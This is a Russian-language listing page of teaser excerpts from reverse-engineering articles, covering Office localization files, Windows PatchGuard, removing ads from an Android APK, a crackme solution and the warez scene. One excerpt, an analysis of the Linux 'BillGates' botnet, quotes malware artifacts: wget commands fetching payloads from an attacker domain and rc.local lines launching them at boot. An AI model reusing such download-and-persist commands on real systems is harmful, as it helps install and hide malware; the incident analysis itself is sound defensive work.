Вы никогда не замечали, что у функции AGGREGATE в Excel у второго набора аргументов неправильное описание аргументов? Фактически, во втором наборе описания аргументов взяты вперемешку из второго и первого наборов. Этот баг точно воспроизводится в Excel 2010, 2013. Мне стало интересно почему так происходит, ведь не могут же в Microsoft так халатно относиться к интерфейсу одного из своих основных продуктов. Итогом стал полный разбор формата файлов локализации MS Office.
Рубрика «reverse engineering» - 12
Разбор формата файлов локализации Microsoft Office
2015-01-22 в 19:33, admin, рубрики: .net, microsoft office, reverse engineering, реверс-инжиниринг, форматы файловWindows 8.1 Kernel Patch Protection — PatchGuard
2014-12-29 в 10:55, admin, рубрики: kernel, reverse engineering, Windows 8.1, Блог компании Positive Technologies, информационная безопасность, системное программированиеПериодически, как правило во вторую среду месяца, можно услышать истории о том, что Windows после очередного обновления перестает загружаться, показывая синий экран смерти. В большинстве случаев причиной такой ситуации оказывается либо руткит, либо специфичное системное ПО, фривольно обращающееся со внутренними структурами ОС. Винят, конечно, все равно обновление, ведь «до него все работало». С таким отношением не удивительно, что «Майкрософт» не поощряет использование всего, что не документировано. В какой-то момент, а именно с релизом Windows Server 2003, MS заняла более активную позицию в вопросе борьбы с чудо-поделками сторонних разработчиков. Тогда появился механизм защиты целостности ядра — kernel patch protection, более известный как PatchGuard.
С самого начала он не позиционировался как механизм защиты от руткитов, поскольку руткиты работают в ядре с теми же привилегиями, а следовательно, PatchGuard может быть обезврежен. Это скорее фильтр, отсекающий ленивых разработчиков руткитов.Читать полностью »
Модификация исходного кода android-приложения с использованием apk-файла
2014-11-28 в 13:09, admin, рубрики: android, reverse engineering, декомпиляция, информационная безопасность, Разработка под androidТак уж получилось, что приложение для чтения комиксов и манги, которое я использую на своем android-смартфоне, после обновления стало показывать рекламу в конце каждой главы комикса. Данное приложение пару лет назад было доступно на Google Play (платная версия которого и была мной куплена), но было удалено в силу «нарушения авторских прав», после чего ушло в подполье и стало распространятся через сайт разработчика. Увы, достойных альтернатив этому приложению на android и iOS я не нашел, но и смотреть рекламу особо не было желания, тем более я уже покупал версию без рекламы. Сам разработчик почему-то не сделал возможности отключить ее, а на просьбы добавить такую возможность не отозвался. Поэтому пришлось искать альтернативные методы ее отключения. Первое, что пришло в голову, это то, что android-приложения пишутся на java, а значит есть вероятность, что автор не обфусцировал свое приложение и его можно попытаться декомпилировать. Немного подумав, я приступил к работе.Читать полностью »
Radare2 собирает денежные средства на проведение своего Summer of Code
2014-04-13 в 23:41, admin, рубрики: debugging, open source, reverse engineering, информационная безопасность, краудфандинг, метки: debugging, open source, reverse engineering, ассемблер
Свободный фреймворк для дизассемблирования и реверс-инжиниринга radare2 запустил краудфандинговую
кампанию с целью собрать 12000 EUR на проведение собственного Summer of Code.
В этом году radare2 не прошел отбор в Google Summer of Code, что не остановило нас, и мы решили всё равно выполнить
задуманное (web интерфейс, бинарные шаблоны, миграция на sdb, ROP-компилятор, ESIL — Evaluable
Strings Intermediate Language, парсер PDB и протокола Windbg, сигнатурный анализ, bokken — графический интерфейс на PyGtk, поддержка новых архитектур).
Читать полностью »
Впечатления от китайской warez-сцены
2014-03-16 в 13:43, admin, рубрики: cracking, reverse engineering, warez, информационная безопасность, История ИТ, китай, копирайт, метки: cracking, reverse engineering, warez, китай*много букв, местами неполиткорректно, текст лежал в столе 5 лет.
Первое знакомство с представителями Китая на Сцене произошло через 2 дня после моего «входа» в ту самую Сцену. Мне понадобился доступ к популярному в то время варез-FTP “Typhoon Epicenter” (о том, что он располагался в Гонг Конге я узнал позже). Из всех друзей и знакомых организовать доступ мог только один человек – «приятель знакомого моего друга». Он оказался китайцем по вере и паспорту, и мы некоторое время плотно общались. Именно после знакомства с ним, я стал относиться к китайцам с пассивным интересом.
Это сумасшедшие в плане доведения своих навыков до абсолюта. Собственно, мы за это их и уважали, потому что у них были "мозги", которых порой не хватало нам – не в плане ума, а в плане кадров. А еще их было много… чертовски много.
Чаще всего китайцы вызывали у нас 3 вида эмоций: уважение, зависть и раздражение. В годах 1997-2004 любой пират, катающий болванки «Лучший Soft 20xx», отдал бы почку за доступ к паре варезных серверов Китая.
Читать полностью »
Сломай меня полностью (ZeroNightsCrackme, Часть 2)
2014-03-10 в 10:46, admin, рубрики: crackme, Darwin, kaspersky lab, ollydbg, python, reverse engineering, zeronights, информационная безопасность, метки: crackme, Darwin, kaspersky lab, ollydbg, python, reverse engineering, zeronights, ассемблерИ снова всем привет! В прошлый раз я раскрыл решение ZeroNightsCrackMe. Все кто успел его вовремя решить, мог получить приглашение на экскурсию в один из офисов Лаборатории Касперского, а так же подарок, в виде лицензионного ключа на три устройства. Но, помимо всего прочего, в Касперском сообщили, что крякми был облегченным, т.е. существует более сложная его версия и она будет разослана тем, кто пожелает её посмотреть (но без подарков, в своё удовольствие, так сказать). Конечно же я не мог отказать себе в том, чтобы не покрутить эту версию, поэтому подтвердил свое желание на участие.
17 февраля пришло письмо с новым крякми. Именно о его решении (и не только) я и поведаю в этой статье.Читать полностью »
Исследуем Linux Botnet «BillGates»
2014-02-26 в 13:51, admin, рубрики: linux, reverse engineering, информационная безопасность, метки: reverse engineering, ботнет
Написал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:
root 4741 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root 4757 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root 4767 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/skysapd
К сожалению, процессы не додумался скопировать
Начальный анализ
Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:
cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
«Хмм, ладно», подумал я. Полез в root'овский crontabЧитать полностью »
Справочный материал hex-редактора 010 Editor: шаблоны (templates)
2014-02-25 в 14:46, admin, рубрики: hex, hex редакор, reverse engineering, исследование, навыки и умения, отладка, ПрограммированиеНаписав пару статей о работе в 010 Editor (часть I, часть II), пришел к выводу, что чем подробно рассказывать о базовых вещах, лучше для начала перевести справку из программы, ибо расписано в ней все неплохо, а русского перевода нет. Итак, в данной статье мы познакомимся с теми особенностями написания шаблонов 010 Editor, о которых говорят сами разработчики.
Бинарные шаблоны — одна из самых мощных возможностей 010 Editor, которая позволяет представить любой файл в виде упорядоченного набора переменных и структур. Шаблоны помогают исследовать и редактировать файлы гораздо более удобным способом, чем это позволяют обычные hex-редакторы. Каждый шаблон представляет собой текстовый файл с расширением "*.bt", который может быть отредактирован в блокноте и прямо в 010 Editor (см. меню Templates). Шаблон запускается как интерпретируемый код, после его работы результат выполнения отображается на панели Template Results. Шаблоны могут быть сконфигурированы для автоматической загрузки и выполнения, когда в редакторе открыт файл с определенным расширением, например, в стандартный набор 010 Editor входят шаблоны для работы с *.zip, *.bmp и *.wav.
Читать полностью »